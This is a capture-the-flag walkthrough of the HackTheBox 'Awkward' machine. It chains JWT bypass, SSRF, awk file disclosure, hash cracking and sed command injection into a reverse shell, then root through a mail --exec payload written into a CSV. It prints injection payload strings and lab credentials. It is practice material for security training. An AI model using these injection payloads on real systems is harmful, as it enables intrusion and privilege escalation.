Awkward
Last updated
Was this helpful?
Last updated
Was this helpful?
In this article I’m going to be tackling Awkward
machine, a medium difficulty Linux machine on hackthebox.com
.
in this machine we will be preseneted with vue js files
loaded with the page where we will search for routes and exploit a jwt malformed token
to bypass authentication and get access to the hr dashboard, exploit ssrf
to leak internal server resources where we will find an api documentation
on port 3002, using this api we will exploit awk
to get a command injection
and extract a user's ssh credentials
to gain initial foothold and from there exploit a sed
command to get command injection
and pivot to the www-data user which have access to a file that we will abuse through the mail command
to get root privileges
as always starting by doing nmap
we see in the nmap scan output that only 2 ports are open ssh
on port 22 and http
on port 80 which is running nginx server
let's take a look at the website running on port 80
it redirects us to http://hat-valley.htb
so lets add this to the /etc/hosts
file so we can access this website
Now you can be able to access the website
using wappalyzer
we can see that it's a nodejs application running on ubuntu's nginx server
if we navigate the website we can see that an online store
is under building so let's fuzz the website for subdomains that may lead us to find the online store website
-mc all
=> match all codes
now let's filter by size and remove all responses with 132 size
we have found the subdomain store.hat-valley.htb
, let's add it to the /etc/hosts
file so we can view the website
the subdomain wants us to login
the application uses php since the application runs normally with the /index.php
enumerating directories on the root of the website
enumerating directories on the store subdomain
seems that enemerating directories doesn't bring somthing of value so let's try enemerating the website frontend files if we inspect the page we will find a bunch of files let's dig and find out if we are going to find something of interest
this is a vue application
(vue is javascript frontend framework)
let's test out those routes, we can notice that the /leave
and /dashboard
routes are redirecting us to /hr
route so login in is mendatory to acces the other routes
let's look for other vue files maybe we can find other routes if we look at the directory called services we have 4 js files let's dig into these files and extract any useful informations so in all those files we get those routes :Cancel changes
/api/all-leave
returns jwt malformed
/api/submit-leave
/api/login
/api/staff-details
returns jwt malformed
/api/store-status
since It throws the error of JWT token Malformed
I think it is a token error so let's pass this without token intercept the request using burp and we can see a token with guest value let's remove and send the request we get invalid user
doing the same but with the /api/staff-details
and we get a list of users data
exfiltrating data from the /api/staff-details
route in a nice format using curl and jq
so we have passwords that are hashed using some algorithm we're going to use this website to know the type of the hashes https://hashes.com/en/tools/hash_identifier
and looking at the result we can see that the hash is SHA256
or use the hash-identifier
command on linux
now let's crack the hashes first thing to do before using hashcat
or john
the ripper let's use crackstation
now let's login using those credentials in the /hr
route that we have found previously
let's intercept this using burp suite
%22http:%2F%2Fstore.hat-valley.htb%22
=> url decode : "http://store.hat-valley.htb"
we are escaping the " because ffuf removes them if we didn't escape them
-fs 0
=> filtering by size and removing empty responses
let's take a look at the internal port 3002
let's open it in the browser and take a deeper look and this the internal api documentation
of all the routes we found previously
/api/login
route is not vulnerable
i will show u how can this syntax awk '\{user}\' /var/www/private/leave_request.csv
get u File Disclosure Vunerability
so if we find a way to poison the user value
(token username) we could get a File Disclosure Vulnerabilty
copy the user token value from the storage -> Cookies -> http://hat-valley.htb
so if we find a way to poison the user value (token username) we could get a file disclosure vulnerabilty
and then navigate to the jwt.io
website to decode the token
in order to poison the token
we need to make sure that the signature is valid
and to do that we need to crack the JWT token
cracking the JWT using hashcat
and now our token have a verified signature
so we can notice that PWD=/var/www/hat-valley.htb
and since the application is a nodejs application there must be a package.json
file so let's leak this file
now we know the path to the server.js
file let's leak this file
discolsing nginx configuration file
for the store subdomain (nginx configuration files always stored in /etc/nginx/sites-available/*.conf)
what this does is if the store subdomain is directed to /cart
or /product-details
return 403 (forbidden) end with .php
require a password which exist in /etc/nginx/conf.d/.htpasswd
let's identify the hash type using hash-identifier
now let's crack it using hashcat, but it couldn't crack it
let's move on and look for the users that exectutes /bin/bash
let's take a look at the .bashrc file
of the user bean (i couldn't discolse the same file for other users) analyzing the file we can notice an alias that backups the user bean's backup and this seems interesting
let's take a look at the backup_home bash script
let's extract the bean_backup_final.tar.gz
from the victim machine, and to do that we need to modify the python script and read the content of the compressed backup as bytes and save it to a file so we can decompress it without errors
now let's run the python script and extract the compressed GZIP data
extracting the gzip using tar, and we have the user's bean backup home
let's see if there is any hidden directories
Discovering bean's credentials in his xpad directory, change directory to .config/xpad
and read the content-DS1ZS1
file which contains some bean's credentials
let's try to ssh using those credentials, and we are in cool
we have found our first flag
let's try if the password we have found in the .config/xpad 014mrbeanrules!#P
may be the password for the store the username is admin
and the password may be 014mrbeanrules!#P
and we are in
now let's move to the directory where the store file are existed
after reading the code in the files i found 3 dangerous system calls in the cart_actions.php file where we may get command execution but if we look at the code we will find that there is blacklist on the special characters so it's not possible to get a command execution from the first 2 system calls but the last one using sed we may exploit it
let's understand how sed can be exploited to inject commands here we have replaced the first line with the command id
so we can inject in the {$item_id} field
let's see where is the add item in the code
now let's go to the shop in the store web application (store.hat-valley.htb) and add some item to the cart and intercept this request using burp
now we will modify the item parameter and the action parameter where the user will be used to inject the commands and action will be delete_item so sed will be called and if we execute this we sleep for 3 seconds
generate a reverse shell script
and put it in the tmp directory
start listener
add_item first and then delete_item with item is 1/d'+-e+"1e+/tmp/reverseshell.sh"+'
to execute the reverse shell
Upgrading Simple Shells to Fully Interactive TTYs
listing processes
and this looks interesting it looks like its monitoring the leave_requests.csv file
let's take a look at the leave_requests.csv file
let's use PSPY
to monitor linux processes without root privileges
, you can download it from this github repository https://github.com/DominicBreuker/pspy
and then transfer it to the www-data session so we can use it there
when we update the leave_request.csv file it invokes a new process called mail
which runs with root privileges
and based on what we get from the pspy we can see the mail command format that runs in the notify.sh script so the schema of the mail command could be this mail -s "Leave Request: " $name christine
to exploit the mail command go to gtfobins
and search for mail to see how mail can be abused to execute scripts echo 'bean --exec="\!/tmp/reverseshell.sh"' >> leave_requests.csv
before you execute this make sure you have set up a listener to catch the reverse shell
we have successfully executed the reverse shell script using the mail command and we have spawned a root shell
and here is the root flag
hope you found this walkthrough easy to understand and follow
Greeting From Sayonara